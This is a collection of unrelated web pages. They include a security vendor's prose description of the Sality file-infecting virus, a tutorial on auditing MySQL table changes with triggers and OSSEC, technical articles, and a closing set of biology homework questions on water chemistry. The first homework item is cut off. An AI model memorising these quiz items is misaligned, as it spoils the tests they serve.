"Probably not at the moment, but this doesn't look to be an immediately productized offering. Instead, they've used this implementation obviously to offer .NET programmers an ML based language to work from if that's suitable, but just as much to prove it can be implemented in short order (less than 10K lines of code, apparently)," O'Grady said.
F# isn't the only language Microsoft is working on, although details about an "X#" are rather murky. X# is rumored to be a language focused on more intelligent processing of things like XML documents, much like ClearMethods' Water language, but there have been denials that the company is working on this. | <urn:uuid:cf54cf1d-f860-4847-83bc-92eaa764afa6> | CC-MAIN-2017-04 | http://www.cioupdate.com/trends/article.php/2211971/Is-F-a-Major-or-Minor-Consideration-for-Microsoft.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00346-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.968187 | 1,101 | 2.953125 | 3 |
What is Community Policing?
“Community policing is a philosophy that promotes organizational strategies that support the systematic use of partnerships and problem-solving techniques to proactively address the immediate conditions that give rise to public safety issues such as crime, social disorder, and fear of crime.”
Community Policing Defined Report from Community Oriented Policing Services (COPS) from the US Department of Justice
History Of Community Policing
The concept of community policing has be around for a long time and in the US it can be traced as far back as the 19th century. The primary purpose for its inception was to have police engaging with communities to build strong relationships between its members and law enforcement. One of the earliest and major tactics of community policing involved officers going on foot patrols through the neighborhoods they serve. In today's modern era, this has evolved to departments incorporating social media and/or community engagement systems to share relevant local information with residents. It has been an integral strategy for cities who have looked to combat violence, drugs and other criminal activities.
Only 17% of US residents age 16 and up have had a face-to-face interaction with a police officer
Only 40% of property crimes and 47% of violent crimes are reported to police
Implementing Community Policing
According to Strategies for Community Policing, common implementations of community policing include:
- Relying on community-based crime prevention by utilizing civilian education, neighborhood watch, and a variety of other techniques, as opposed to relying solely on police patrols.
- Re-structuralizing of patrol from an emergency response based system to emphasizing proactive techniques such as foot patrol.
- Increased officer accountability to civilians they are supposed to serve.
- Decentralizing the police authority, allowing more discretion amongst lower-ranking officers, and more initiative expected from them.
“Applying community policing techniques backed by the principles of ethical policing will produce a notable correlation between the collaborative relationship that will be fostered and a palatable decline in crime.”
Jon Gaskins, PoliceOne
Community Policing Analysis
A 2014 study published in the Journal of Experimental Criminology, “Community-Oriented Policing to Reduce Crime, Disorder and Fear and Increase Satisfaction and Legitimacy among Citizens: A Systematic Review,” systematically reviewed and synthesized the existing research on community-oriented policing to identify its effects on crime, disorder, fear, citizen satisfaction, and police legitimacy.
The study found:
- Community-policing strategies reduce individuals’ perception of disorderly conduct and increase citizen satisfaction.
- In studying 65 independent assessments that measured outcomes before and after community-oriented policing strategies were introduced, they found 27 instances where community-oriented policing was associated with 5% to 10% greater odds of reduced crime.
- 16 of the 65 comparisons showed community-oriented policing was associated with a 24% increase in the odds of citizens perceiving improvements in disorderly conduct.
- 23 comparisons measured citizen satisfaction with police, and found that community-oriented programs were effective almost 80% of the cases, and citizens were almost 40% more likely to be satisfied with the work of the police.
Although this study was not definitive, it provides important evidence for the benefits of community policing for improving perceptions of the police. The overall findings are ambiguous, and show there is a need to explicate and test a logic model that explains how short-term benefits of community policing, like improved citizen satisfaction, relate to longer-term crime prevention effects, and to identify the policing strategies that benefit most from community participation.
Why Everbridge for Improved Community Policing
Control Public Information Dissemination
Maintain complete power and control to author messages and disseminate information to the public at will.
Easy Resident Text Opt-In
Easily increase resident opt-in’s at an exponential rate. Maintain a robust database of resident contact information to foster a community dialogue or provide effective emergency notifications.
A Force Multiplier
Publish and distribute public information at scale, with the push of one button, via social media, websites, email, text, mobile app, and Google Alerts. Leverage residents to act as force multiplier to assist in preventing and solving crime. Ideal when internal resources are limited.
Precise Neighborhood Targeting
The most precise neighborhood-level geographic targeting system available. Send messages to specific communities or neighborhoods.
Focus on Public Safety
The most trusted public safety product on the market, as used by over 8,000 public safety agencies. Completely focused on helping agencies keep residents safe and informed. | <urn:uuid:961fefa7-7e71-4c33-903d-314058746f16> | CC-MAIN-2017-04 | https://www.everbridge.com/community-policing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00070-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9404 | 944 | 3.375 | 3 |
Military Transformers: 20 Innovative Defense TechnologiesDepartment of Defense technologies under development, from brainy microchips to battlefield transformer vehicles, promise to make the U.S. military more nimble. Here's a visual tour of 20 breakthrough ideas.
11 of 20
Can a computer chip mimic the human brain? That's the goal of DARPA's Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) program, which aims to develop systems that not only mimic the brain, but do so at biological scale. That requires development of integrated circuits that are packed with electronics and integrated communications that approximate the function of neurons and synapses. The ultimate goal is to build systems that "understand, adapt, and respond" to information, says DARPA. Potential uses include robotic systems and sensory applications.
Top 10 Open Government Websites
U.S. Military Robots Of The Future: Visual Tour
NASA's Next Mission: Deep Space
NASA's Blue Marble: 40 Years Of Earth Images
DOD Mobile App Eases Transition To Civilian Life
Army Aids Wounded Warriors With Mobile App
Army Eyes Monitoring Tools To Stop Wikileaks Repeat
10 Lessons From Leading Government CIOs
14 Cool Mobile Apps From Uncle Sam
11 Epic Technology Disasters
11 of 20 | <urn:uuid:9a02b736-79f2-40e4-8cfe-286ef1fcbb10> | CC-MAIN-2017-04 | http://www.darkreading.com/risk-management/military-transformers-20-innovative-defense-technologies/d/d-id/1104353?page_number=11 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00282-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.822198 | 263 | 2.578125 | 3 |
Accelerators, like NVIDIA Tesla GPUs and Intel Xeon Phi coprocessors, made a big splash this year at SC13 as these highly parallel number-crunchers carved out a significant presence on both the TOP500 and Green500 charts, but there’s another promising use for accelerators, according to Fermilab researcher Wenji Wu: network monitoring.
Traditional network analysis tools have struggled to keep pace with the traffic demands as network bandwidth has skyrocketed. Adding to the strain, network administrators expect to be able to examine packets in real-time.
Wu, a network researcher at the U.S. Department of Energy’s Fermi National Accelerator Laboratory, believes that GPUs may offer some advantages over the current technology, which employs CPUs and ASICs. He delivered a paper presentation at SC13 last month, describing his research using off-the-shelf NVIDIA GPUs as network monitors in high-speed networks. According to Wu and his team, graphics chips are well-suited to the task.
Wu affirms that GPUs have “a great parallel execution model.” They offer high compute power, ample memory bandwidth, easy programmability, and can divvy up the processing duties into parallel tasks.
The Fermilab team, under Wu’s direction, built a prototype GPU-accelerated network performance monitoring system called G-NetMon to support large-scale scientific collaborations. The G-NetMon system consists of two 8-core 2.4 Ghz AMD Opteron 6136 processors, two Gbps Ethernet interfaces, 32 GB of system memory and one Tesla C2070 Fermi GPU.
“Our system exploits the data parallelism that exists within network flow data to provide fast analysis of bulk data movement between Fermilab and collaboration sites,” notes Wu. “Experiments demonstrate that our G-NetMon can rapidly detect sub-optimal bulk data movements.”
G-NetMon was designed to handle current network loads and also be able to accommodate expected future traffic demands. An experiment showed that the GPU-based prototype was between nine to 17 times faster than a single-core CPU. When compared to a six-core CPU, the GPU setup was about 1.5 times to 3 times faster. The next step for the researchers is to add some security features. | <urn:uuid:ba8edfff-06d3-4cbd-bfb5-23987c95f70b> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/02/gpus-ease-network-monitoring-chore/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00190-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925925 | 488 | 2.5625 | 3 |
Eclipse is created by an Open Source community and is used in several different areas, e.g. as a development environment for Java or Android applications. Eclipse roots go back to 2001. The prime objectives of this course are to provide the developer with a practical working knowledge of how the development and testing of COBOL applications can be effectively used on the Workstation, using the Micro Focus Eclipse development tools.
Micro Focus Visual COBOL is a contemporary development suite that allows developers to maintain, develop and modernize your applications. Visual COBOL for Studio is an Integrated Development Environment (IDE) for many languages. These include Visual Basic, Visual C#, Visual C++ and COBOL. Micro Focus has provided extensive functionality to provide a Visual Studio development environment for COBOL applications. This also enables the integration of COBOL Programming with the other Visual Studio supported languages.
This hands-on web based training course teaches you how to design and code COBOL programs. It explains basic COBOL constructs and continues through to lessons on strategic modular programming. The course also provides practical tips and best practices used by experienced COBOL professionals that will help you avoid programming pitfalls. | <urn:uuid:f9fcff63-af5d-4285-856c-043f26e8cd88> | CC-MAIN-2017-04 | https://www.microfocus.com/ondemand/course_category/visual-cobol/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00098-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.893777 | 241 | 2.78125 | 3 |
When you scan a document, the scanner is creating an image. The image is one single block of information. You can look at it on your screen and edit it like a photo document, but you cannot edit the text that it contains.
The purpose of the Optical Character Recognition (OCR) function is to allow you to edit, format, or erase the text in the scanned document. NOTE: To enable you to work with the scanned text, the software links the image to your selected word processing application.
For more information, please refer to the driver CD and documentation that came with your Lexmark All-In-One. | <urn:uuid:cb11bfea-1fca-4e82-a006-f78760f09ccb> | CC-MAIN-2017-04 | http://support.lexmark.com/index?page=content&id=FA10&locale=en&userlocale=EN_US | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00218-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903383 | 129 | 2.96875 | 3 |
The variable optical attenuator (VOA) has a wide range of applications in optical communication; its main function is to reduce, and more generally to control, the power of an optical signal.
The behavior of a fiber optic network must be dynamically adjustable. In particular, with the deployment of DWDM transmission systems and EDFAs in optical communication, gain flattening or equalization must be performed across the many channels of a transmission link, and the channel power arriving at an optical receiver must be dynamically controlled to keep the receiver out of saturation. Optical networks also need to control other signals, which makes the VOA an indispensable key component. In addition, a VOA can be combined with other optical communication components, elevating it into a higher-level module.
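Before looking at the individual technologies, it helps to recall how attenuation is quantified: in decibels relative to the input power. The short Python sketch below shows the relationship between input power, output power, and attenuation in dB; the function names and example values are ours for illustration, not from any product datasheet.

```python
import math

def attenuation_db(p_in_mw: float, p_out_mw: float) -> float:
    """Attenuation in dB given input and output optical power (mW)."""
    return 10.0 * math.log10(p_in_mw / p_out_mw)

def output_power(p_in_mw: float, atten_db: float) -> float:
    """Output power (mW) after applying a given attenuation (dB)."""
    return p_in_mw / (10.0 ** (atten_db / 10.0))

# Example: a 1 mW (0 dBm) channel attenuated by ~3 dB drops to ~0.5 mW.
print(attenuation_db(1.0, 0.5))   # ~3.01 dB
print(output_power(1.0, 3.0))     # ~0.501 mW
```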
In recent years, many technologies for manufacturing variable optical attenuators have appeared, including mechanical VOA, magneto-optical VOA, liquid crystal VOA, MEMS VOA, thermo-optic VOA and acousto-optic VOA.
The mechanical VOA's principle is to use a stepper motor to drag a neutral-density gradient filter: as the beam passes through different positions of the filter, the output optical power changes according to a predetermined attenuation rule, thereby adjusting the amount of attenuation. There is also a mechanical reflective optical attenuator. Its basic principle is that the light beam entering from the ingress port is reflected by a tilting mirror toward the egress port; the coupling efficiency between the two ports is controlled by the inclination angle of the mirror, enabling adjustment of the attenuation, and the inclination can be controlled by a variety of mechanisms. The mechanical optical attenuator is the more traditional solution, and so far most VOAs applied in systems use the mechanical method to achieve attenuation. This type of attenuator offers mature technology, good optical performance, low insertion loss, low polarization-dependent loss and no need for temperature control; its disadvantages are a larger size, a more complex structure, a low response rate and difficulty in automated production, which is not conducive to integration.
The magneto-optical VOA uses the changes in optical properties that some substances show in a magnetic field, such as magnetic rotation (the Faraday effect), to attenuate the light energy and thereby adjust the optical signal. Combining magneto-optical materials with other techniques makes it possible to create an optical attenuator with high performance, small size, fast response and a relatively simple structure. This is a further development of discrete-technology attenuators in this field.
The liquid crystal VOA utilizes the refractive-index anisotropy of liquid crystals, which show birefringence. When an external electric field is applied, the liquid crystal molecules reorient, changing the cell's transmission characteristics. This type achieves attenuation through light-intensity changes controlled by the voltage applied to the two electrodes enclosing the liquid crystal. The liquid crystal VOA can achieve miniaturization and fast response, but the liquid crystal material introduces larger losses, the production process is relatively complex, and the device is sensitive to environmental factors; its advantages are low cost and the existence of commercial volume production.
MEMS is the newest of these technologies in this area. After several years of development, the MEMS chip production process has matured, strongly promoting the application of MEMS optical attenuators. In optical network applications, MEMS-based products also have an obvious advantage in price and performance. The MEMS VOA is now very mature, mass-produced and applied on a large scale. Because of yield problems, however, it still faces challenges on price, and the reliability of micro-electro-mechanical components is sometimes less than ideal. Early MEMS VOAs used laser welding, which made the devices larger, lowered production efficiency and raised assembly costs. Plastic-packaged MEMS VOAs have recently come to market and largely solve this problem.
The thermo-optic VOA mainly exploits the way the optical properties of certain materials change with the temperature field, such as refractive-index changes caused by temperature variation. According to structure, it can be divided into two categories: leakage-type and open-light-type VOAs. The thermo-optic VOA's heating and cooling arrangement is relatively complex, the mathematical relationship between the temperature field and the refractive index of the light-guiding medium is complicated and difficult to quantify and control accurately, and above all the long response time has hindered its application in modern optical communication.
The acousto-optic VOA's basic principle is that, under the action of an ultrasonic wave, periodic strain is generated in an acousto-optic crystal, producing a periodic variation of the refractive index that is equivalent to a phase grating; this grating can then be used to modulate the beam. Some companies have already claimed to have developed an acousto-optic crystal variable attenuator (called an AVOA). Reportedly, acquiring the acousto-optic crystal material is not a problem, but at this stage the total cost is high (about 4-5).
The variable optical attenuator is one of the important optical devices in optical communication systems. For years its development was stuck at the mechanical level; because that size is not conducive to integration, it is generally suitable only for single-channel attenuation. With the development of DWDM systems, and the potentially huge market demand for flexibly upgradeable reconfigurable optical add-drop multiplexers (ROADMs), there is a need for variable optical attenuator arrays with more channels and smaller size, in particular integrated VOA products. Traditional mechanical methods cannot solve these problems. With the development of fiber optic networks, VOA development trends are: low cost, high integration, fast response time, and hybrid integration with other optical communication devices.
In much the same way the internet transformed the banking industry through the introduction of online banking, big data stands to revolutionize how loans are handled. Think about the headaches you have to go through when getting a loan for a car, home, or new business. There’s bound to be piles of paperwork you need to fill out, some of which may require a law degree to fully understand. That’s not to mention the discussions you’ll need to have with loan officers and the many visits you’ll need to pay to the bank. Much of that is changing now as big data gets used for approving people for loans. It’s a new way to evaluate risk that helps give people with no credit the chance to get those loans that can change their lives.
When speaking of online lending using big data, it's important to point out that the benefits go beyond getting approved for a loan when you otherwise might not. With big data, loans can be approved much more quickly, bypassing the hours usually needed in the more traditional way. It's a quick process that in some instances can actually lead to interest rates lower than market averages. Needless to say, it's an appealing option that many will be drawn to, especially younger generations used to conducting their business in digital form.
Banks and lending institutions are not charities, though. When dealing with loans, the name of the game is risk. These organizations want to evaluate how likely you are to repay the money they give you, plus interest. That’s where big data plays its biggest role. Whereas most banks and credit unions will look at your credit score to determine how risky lending money to someone is, many startup lending companies use different — and some would say unorthodox — methods. With a combination of big data and machine learning capabilities, they can figure out the likelihood you’ll repay a loan through some unlikely factors that you may not have thought of.
Have you ever given much thought to the time of day you ask for a loan? What about how many emails you send out every day? Did you know that your Facebook friends could determine how likely you are to repay a loan? Some of these items may seem unimportant, but through big data analytics, experts have found that they provide signs of whether lending money to a person or business is risky. As more institutions embrace big data and Hadoop in the cloud, they're finding that these seemingly innocuous elements may be more accurate than the usual credit score in determining repayment reliability. If it takes you a while to type in an email address, for example, big data has shown that this may indicate you're using a new email created expressly for the loan application (which is usually not a good sign). And they've also found that Apple users are less risky to lend to. Make of that what you will.
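To make this concrete, here is a minimal sketch of how such signals could feed a credit-risk classifier. The features (email account age, hour of application, seconds taken to type the email address) are hypothetical stand-ins inspired by the article, the training data is toy data invented purely for illustration, and no real lender's model is implied:

import numpy as np
from sklearn.linear_model import LogisticRegression

# Toy history: [email_age_days, application_hour, secs_to_type_email]
X = np.array([
    [1200, 14,  4.0],
    [   3,  2, 15.0],
    [ 800, 10,  5.5],
    [   7,  3, 12.0],
    [2000, 16,  3.5],
    [  10,  1, 20.0],
])
y = np.array([1, 0, 1, 0, 1, 0])  # 1 = loan repaid, 0 = defaulted

model = LogisticRegression().fit(X, y)

# Score a new applicant with a week-old email applying at 3 a.m.
applicant = np.array([[7, 3, 13.0]])
print("Estimated probability of repayment:", model.predict_proba(applicant)[0, 1])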
Based on these and other factors, people can be approved for online loans even if they don't have a credit score. From this perspective, it's easy to see how big data can be a blessing for those who would be shut out of the process under normal circumstances. As helpful as these types of loans can be, it's important to note that for now, most of them are designed for the short term, and even though interest rates can be lower, some of those same factors may lead to loans with higher rates. It's all done on a case-by-case basis, but when these alternative lenders approve up to 60 percent of small-business loans, compared with an average of 20 percent at other organizations, the option can't be dismissed.
The use of big data in this way, however, is not without controversy. Being denied a loan simply because you're friends on Facebook with the wrong people strikes many as absurd. Not to mention that this delves into personal details more than usual, which may feel like an intrusion on privacy. Despite these concerns, big data is clearly the future for loans. Big banks are no strangers to big data analytics, so it's likely only a matter of time before they adopt similar processes.
Rick Delgado is a technology commentator and freelance writer.
Subscribe to Data Informed for the latest information and news on big data and analytics for the enterprise, plus get instant access to more than 20 eBooks. | <urn:uuid:cdd28849-9538-4488-bba3-a776b0bb2851> | CC-MAIN-2017-04 | http://data-informed.com/how-big-data-will-transform-the-lending-industry/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00520-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95734 | 905 | 2.609375 | 3 |
Sality refers to an old, large family of viruses that infect executable files. Over the years, new functionalities have been added to the malware to keep it active and current. Modern Sality variants can, among other things, act as a backdoor and connect infected machines to a botnet.
Depending on the settings of your F-Secure security product, it will either automatically delete, quarantine or rename the suspect file, or ask you for a desired action.
More scanning & removal options
More information on the scanning and removal options available in your F-Secure product can be found in the Help Center.
You may also refer to the Knowledge Base on the F-Secure Community site for more information.
The Sality virus family has been circulating in the wild since as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, keeping it an active and relevant threat despite its relative age.
Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.
Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as appending. The viral code that Sality inserts is polymorphic, a form of complex code intended to make analysis more difficult.
Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. With this technique, the virus inserts a command somewhere in the middle of an infected file's code, so that when the system executes the file and reaches that command, it is forced to 'jump' to the malware's code and run that instead. This makes discovery and disinfection of the malicious code harder.
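To see why EPO frustrates naive scanners, consider that a common quick check for file-infecting viruses is simply where a PE file's entry point lands. Here is a minimal sketch of that heuristic using the pefile Python library (a generic illustration, not F-Secure's detection logic; "sample.exe" is a placeholder filename):

import pefile  # pip install pefile

def entry_point_section(path: str) -> str:
    # Return the name of the PE section that contains the entry point.
    pe = pefile.PE(path)
    entry = pe.OPTIONAL_HEADER.AddressOfEntryPoint
    for section in pe.sections:
        start = section.VirtualAddress
        end = start + max(section.Misc_VirtualSize, section.SizeOfRawData)
        if start <= entry < end:
            return section.Name.rstrip(b"\x00").decode(errors="replace")
    return "<no section>"

# An appending virus often betrays itself by an entry point in the last
# section; an EPO virus keeps the original entry point and instead hijacks
# an instruction deep inside the code, so this simple check passes.
print(entry_point_section("sample.exe"))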
Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
For representative examples of Sality viruses, see the following descriptions:
Description Created: 2010-05-04 08:33:51.0
Description Last Modified: 2015-08-13 08:11:38.0 | <urn:uuid:1f9d99f0-cfbe-4186-8f3f-232af00e0e33> | CC-MAIN-2017-04 | https://www.f-secure.com/v-descs/virus_w32_sality.shtml | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00062-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93898 | 577 | 2.640625 | 3 |
By Andrew Zonenberg @azonenberg
In the post “Reading CMOS layout,” we discussed understanding CMOS layout in order to reverse-engineer photographs of a circuit to a transistor-level schematic. This was all well and good, but I glossed over an important (and often overlooked) part of the process: using the photos to observe and understand the circuit’s actual geometry.
Let’s start with brightfield optical microscope imagery. (Darkfield microscopy is rarely used for semiconductor work.) Although reading lower metal layers on modern deep-submicron processes does usually require electron microscopy, optical microscopes still have their place in the reverse engineer’s toolbox. They are much easier to set up and run quickly, have a wider field of view at low magnifications, need less sophisticated sample preparation, and provide real-time full-color imagery. An optical microscope can also see through glass insulators, allowing inspection of some underlying structures without needing to deprocess the device.
This can be both a blessing and a curse. If you can see underlying structures in upper-layer images, it can be much easier to align views of different layers. But it can also be much harder to tell what you’re actually looking at! Luckily, another effect comes to the rescue – depth of field. | <urn:uuid:afde65d7-bb4e-4c97-ac50-9da32b5945e8> | CC-MAIN-2017-04 | http://blog.ioactive.com/2016_03_01_archive.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00088-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917874 | 277 | 3.203125 | 3 |
Databases are a core component of many applications and websites; almost everything is stored in them. Take a standard e-commerce website: its databases hold a lot of business-critical information about customers (PII), articles, prices, stocks, payments (PCI), orders, logs, sessions, etc. Like any component of an IT infrastructure, databases must be properly monitored from a security point of view. They are often an Achilles' heel due to security issues; common problems are a lack of access control on the SQL commands allowed or bad passwords. All databases have mechanisms to log events related to sessions (login, logout) or the system, but what about detecting unauthorized modifications of data stored in tables? Those can compromise the database's integrity. How can such controls be implemented with a very common database server (MySQL)?
Of course, MySQL already implements some logging features, configured via your my.cnf file or the command line. There are five types of logs available in MySQL:
- Error log: contains the events related to the MySQL daemon
- General query log: contains the client connection and queries
- Binary log: contains the changes applied to data (for rollback & replication)
- Relay log: contains the changes performed during replication
- Slow query log: contains the queries that took more time than expected
The most important log is the query log, but it is a "performance killer": logging all queries consumes a lot of resources (CPU, storage), and the resulting volume of events can be painful to process.
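For reference, these logs are enabled through my.cnf along the following lines (directive names as in MySQL 5.1 and later; the file paths are illustrative, with the error-log path matching the one used later in this article):

[mysqld]
log_error        = /var/lib/mysql/errors.log
general_log      = 1                          # the "performance killer": enable with care
general_log_file = /var/log/mysql/query.log
slow_query_log   = 1
long_query_time  = 2                          # seconds before a query counts as slow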
Basically, I would like to monitor all changes performed on a specific table called “users” which contains the credentials of all users allowed to use an application. From a SQL point of view, three commands must be monitored: “INSERT”, “UPDATE” and “DELETE”. Of course, changes will be reported by OSSEC (why change a winning team?).
MySQL has two interesting features which be very helpful to achieve this:
- Triggers – From the MySQL website, a trigger is defined as is “a named database object that is associated with a table, and that activates when a particular event occurs for the table“. An example of trigger is copying all new inserted records in table “A” to table “B” for backup purpose.
- UDF (“User Defined Functions“) – UDF is a powerful way to extend the features of a MySQL server. New functions are added via shared libraries (examples of UDFs: statistical functions, string manipulations). There is an online repository of free UDFs called mysqludf.org.
Triggers will be defined on the table(s) we need to monitor: one trigger per command that could alter data integrity (insert, update, delete). As I'm not a SQL expert, I found an interesting paper from Peter Brawley about "Transaction time validity in MySQL" (link). In his paper, Peter explains how to keep an audit trail of the changes performed on a table by inserting new rows into a "log" table each time a change is performed on the main one. But there is a major issue: our changes are logged inside MySQL, and OSSEC cannot directly read a MySQL table. My first idea was to use an active-response script to dump the data, but it looked too resource-consuming. On the other hand, OSSEC is king at parsing text files. Unfortunately, a new problem: a query like "SELECT ... INTO OUTFILE xxx" does not work from triggers, and for security reasons the output file must not already exist.
Another way to interact with the file system is by using a UDF. The mysqludf.org site has very interesting stuff. Let's have a look at lib_mysqludf_log, which does exactly what we need: it creates a new function called log_error() that writes the string passed as an argument into the MySQL error log. OSSEC can then access all relevant information via this file. One picture is worth a thousand words; here is how the integrity checks will be performed:
Let's implement the whole thing...
First, install the lib_mysqludf_log.so shared library (Note that the MySQL development environment is required):
# cd /tmp
# wget http://www.mysqludf.org/lib_mysqludf_log/lib_mysqludf_log_0.0.2.tar.gz
# tar xzvf lib_mysqludf_log_0.0.2.tar.gz
# gcc -I/usr/include/mysql -shared -fPIC -o lib_mysqludf_log.so lib_mysqludf_log.c
# cp lib_mysqludf_log.so /usr/lib/mysql/plugin
# service mysql restart
Once done, enable the new function (this must be performed for each database you would like to monitor):
# mysql -u user -p
mysql> create database acme;
mysql> use acme;
mysql> create function lib_mysqludf_log_info
    -> returns string soname 'lib_mysqludf_log.so';
mysql> create function log_error
    -> returns string soname 'lib_mysqludf_log.so';
To test, launch a ‘tail -f errors.log’ in a shell, and send the following query to your MySQL server:
mysql> use acme;
mysql> select log_error("foobar");
+---------------------+
| log_error("foobar") |
+---------------------+
| NULL                |
+---------------------+
1 row in set (0.00 sec)
You should see the string “foobar” appended at the end of the errors.log. The SQL output is normal and can be simply ignored. Now, we have a simple way to write data that will be parsed by OSSEC. Let’s create some triggers. In the example below, I need to monitor the table containing user credentials (to access a web application). Any change which could alter the table integrity must be reported. First, we create the table ‘users’ then we add one trigger per action.
We also need to create a fake table (called "dummy" in the example below) because the triggers need to execute a fake insert query. This table will always remain empty. Alternatively, you can use an existing table.
# mysql -u root -p acme
mysql> create table users (
    -> id int primary key auto_increment,
    -> login char(20) not null,
    -> password char(20) not null);
mysql> create table dummy (
    -> fake char(1) not null);
mysql> create trigger users_insert after insert on users
    -> for each row
    -> insert into dummy values(
    -> log_error(concat(now()," Table: acme.users: insert(",
    -> NEW.id,",",NEW.login,",",NEW.password,") by ",user())));
mysql> create trigger users_update after update on users
    -> for each row
    -> insert into dummy values(
    -> log_error(concat(now()," Table: acme.users: update(",
    -> NEW.id,",",NEW.login,",",NEW.password,") by ", user())));
mysql> create trigger users_delete after delete on users
    -> for each row
    -> insert into dummy values(
    -> log_error(concat(now()," Table: acme.users: delete(",
    -> OLD.id,",",OLD.login,",",OLD.password,") by ", user())));
Our newly implemented log_error() function is very basic and does not allow formatting the string with variables; we have to use the concat() SQL function to build a single string containing the original fields as well as interesting information like a timestamp and the logged-in user. From a security point of view, the fields are passed directly to the log_error() function without further checks! Don't forget that all data stored in a database must be properly sanitized by the application; one way to harden the triggers themselves is sketched below.
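If log injection through those unchecked fields is a concern, a possible variation (my own illustrative tweak, not part of the original setup) is to hex-encode the user-controlled columns with MySQL's built-in HEX() function before logging them, at the cost of log readability:

mysql> drop trigger users_insert;
mysql> create trigger users_insert after insert on users
    -> for each row
    -> insert into dummy values(
    -> log_error(concat(now()," Table: acme.users: insert(",
    -> NEW.id,",",HEX(NEW.login),",",HEX(NEW.password),") by ",user())));

The same change applies to the update and delete triggers. It's time to test: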
# mysql -u root -p acme
mysql> insert into users values(7, "xavier", encrypt("password"));
mysql> update users set password=encrypt("newpassword") where id=7;
mysql> delete from users where id=7;
The results will be immediately written in the MySQL errors.log:
# tail -f errors.log
2011-01-07 16:38:30 Table: acme.users: insert(7,xavier,zZDDIZ0NOlPzw) by admin@localhost
2011-01-07 16:38:35 Table: acme.users: update(7,xavier,RjdqndSkxdjeX) by admin@localhost
2011-01-07 16:38:53 Table: acme.users: delete(7,xavier,RjdqndSkxdjeX) by admin@localhost
The last step is to configure your OSSEC server/agent to handle the new events. Create a new rule in your local_rules.xml and configure your server/agent to process the errors.log file:
<!-- MySQL Integrity check -->
<rule id="100025" level="7">
  <regex>^\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d Table: \.</regex>
  <description>MySQL users table updated</description>
</rule>

<localfile>
  <log_format>syslog</log_format>
  <location>/var/lib/mysql/errors.log</location>
</localfile>
And the final result, an OSSEC notification:
OSSEC HIDS Notification.
2011 Jan 08 00:31:24

Received From: (xxxxx) xx.xxx.xxx.xxx->/var/lib/mysql/errors.log
Rule: 100025 fired (level 7) -> "MySQL users table updated"
Portion of the log(s):

2011-01-08 00:31:24 Table: acme.users: insert(8,brian,qavXvxlEVykwm) by admin@localhost

--END OF NOTIFICATION
This is a simple example of auditing data changes in databases. Remember that auditing every database transaction has a huge performance impact and is not practical; this method does not hurt your server's performance and does not pollute your logs. As usual, this must be seen as a proof-of-concept. Comments are welcome!
Chapter 3 Water: Homework
1) The atoms in a water molecule are held together by covalent bonds. This means that the bonded atoms
2) Which statement is true about hydrogen bonds between water molecules? A) They are about as strong as the covalent bonds in a water molecule. B) They arise because of the linear geometry of water. C) They cause water to have an unusually low freezing point for its molecular weight. D) They involve the unequal sharing of a proton between water molecules. E) In liquid water the same molecules attract to each other over long time periods.
3) The abundance of water in the cells and tissues helps to minimize temperature fluctuations. This is due to what property of water? A) Density. B) Viscosity. C) Specific heat. D) Boiling point.
4) Compounds that ionize when dissolved in water are called ________.
A) electrolytes B) polar compounds C) hydrophobic compounds D) amphipathic compounds

5) Poorly soluble molecules such as lipids and nucleoside bases can be made more soluble in cells by attaching ________ to them.
A) water B) oxygen C) carbohydrates D) salt ions

6) Electrolytes dissolve readily in water because
A) they are held together by electrostatic forces. B) they are hydrophobic. C) water molecules can cluster about cations. D) water molecules can cluster about anions. E) water molecules can cluster about cations and anions.

7) A molecule or ion is said to be hydrated when it ________.
A) is neutralized by water B) is surrounded by water molecules C) reacts and forms a covalent bond to water D) aggregates with other molecules or ions to form a micelle in water

8) If liquid A is more polar than liquid B, you might expect
a) Liquid A to evaporate faster than liquid B
b) Liquid A to evaporate more slowly than liquid B
c) Liquid A and liquid B to evaporate at the same rate
d) Liquid B to be colored
9) Solutes diffuse more slowly in cytoplasm than in water because of
A) the higher viscosity of water. B) the higher heat of vaporization of water. C) the presence of many crowded molecules in the cytoplasm. D) the absence of charged molecules inside cells.

